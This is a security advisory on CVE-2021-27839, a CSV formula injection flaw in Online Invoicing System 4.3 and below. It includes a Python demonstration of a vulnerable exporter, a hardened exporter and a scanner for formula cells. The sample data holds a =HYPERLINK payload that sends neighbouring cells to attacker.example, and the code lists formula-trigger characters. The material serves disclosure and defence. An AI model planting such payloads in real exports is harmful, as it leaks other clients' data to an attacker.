CSV Injection in Online Invoicing System (OIS)

Online Invoicing System is an open source web application by BigProf Software that can be used for the simple invoicing needs of small businesses, consultants and freelancers. OIS 4.3 and below were found to be vulnerable to CSV Injection during my testing.

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with ‘=’ will be interpreted by the software as a formula. Maliciously crafted formulas can be used for performing attacks.

— OWASP

CVE-2021-27839

Impact

A regular (low-privileged) user can store a formula payload in a free-text field of their own client record. When an authenticated admin uses the Save CSV feature to export the details of all clients and opens the resulting file in a spreadsheet application, the formula is evaluated in the admin's context. This can lead to unintended actions such as redirecting the admin to unknown or harmful websites, and it can be used to exfiltrate the other clients' details from the same export, data the regular user had no access to in the application itself.
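To make the mechanism in the OWASP description and the Impact section above concrete, here is an added example (not OIS code and not the advisory author's work; it is written in Python rather than OIS's own PHP). It pairs a vulnerable exporter that writes user-controlled fields verbatim with a hardened exporter that neutralizes formula-triggering cells, plus a scanner that flags cells a spreadsheet would evaluate. The client records are constructed sample data, `attacker.example` is a placeholder host, and the `HYPERLINK` payload is one illustrative formula, not a reproduction of any specific payload used against OIS.

```python
# Added example (not from OIS or the advisory author): a minimal Python
# reproduction of the CSV Injection pattern, with a vulnerable exporter,
# a hardened exporter and a scanner for formula-triggering cells.
import csv
import io

# Constructed sample client records. The second record's name field carries
# the kind of payload a low-privileged user could store in their own client
# record: HYPERLINK is a standard spreadsheet function, and when the admin
# clicks the cell it sends the contents of neighbouring cells (A1, B1) to a
# host the attacker controls. attacker.example is a placeholder domain.
CLIENTS = [
    {"name": "Acme Ltd", "email": "billing@acme.example", "balance": "1200.00"},
    {"name": '=HYPERLINK("https://attacker.example/?leak="&A1&B1,"Acme Ltd")',
     "email": "mallory@example.net", "balance": "0.00"},
    # A benign value that still begins with a trigger character: spreadsheets
    # would try to evaluate "-Dash Consulting" too, so it must be escaped.
    {"name": "-Dash Consulting", "email": "info@dash.example", "balance": "300.00"},
]

# Characters that make Excel / LibreOffice Calc treat a cell as a formula
# (the set listed on the OWASP CSV Injection page): =, +, -, @, tab, CR.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
COLUMNS = ("name", "email", "balance")


def is_formula_cell(cell):
    """True if a spreadsheet would evaluate this cell rather than show it as text.
    Leading spaces are ignored so that ' =1+1' style variants are caught too."""
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize(value):
    """Force text interpretation by prefixing a single quote. Excel treats a
    leading apostrophe as a text marker and does not display it."""
    text = str(value)
    return "'" + text if is_formula_cell(text) else text


def _write_csv(rows, transform):
    buf = io.StringIO()
    writer = csv.writer(buf)  # quotes fields containing commas, quotes or newlines
    writer.writerow(COLUMNS)
    for row in rows:
        writer.writerow([transform(row[col]) for col in COLUMNS])
    return buf.getvalue()


def export_vulnerable(rows):
    """Mirrors the flaw: untrusted fields are written exactly as stored."""
    return _write_csv(rows, str)


def export_hardened(rows):
    """Same export with every cell passed through neutralize()."""
    return _write_csv(rows, neutralize)


def find_formula_cells(csv_text):
    """Scan an export and return (row, column) of every cell that would be
    evaluated as a formula. Useful as a regression check on exporter output."""
    reader = csv.reader(io.StringIO(csv_text, newline=""))
    return [(r, c) for r, row in enumerate(reader)
            for c, cell in enumerate(row) if is_formula_cell(cell)]


if __name__ == "__main__":
    vulnerable = export_vulnerable(CLIENTS)
    hardened = export_hardened(CLIENTS)
    print("vulnerable export flags:", find_formula_cells(vulnerable))  # [(2, 0), (3, 0)]
    print("hardened export flags:  ", find_formula_cells(hardened))    # []
    print(hardened)
```

Two design points worth noting: the check is applied to every exported cell rather than only to fields known to be user-editable, because the set of attacker-influenced fields tends to grow as an application evolves; and the scanner is kept separate from the exporter so it can also be run against exports produced by the real application as a regression check.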

Timeline

  • Vulnerability reported to the BigProf Software team – February 04, 2021
  • OIS 4.4 containing the fix to the vulnerability released – February 27, 2021

Recommendation

It is highly recommended to update OIS to version 4.4 or later, which contains the fix. Until then, treat any CSV exported from an affected instance as untrusted and inspect it in a plain text editor before opening it in a spreadsheet application.

Written by
Jinson Varghese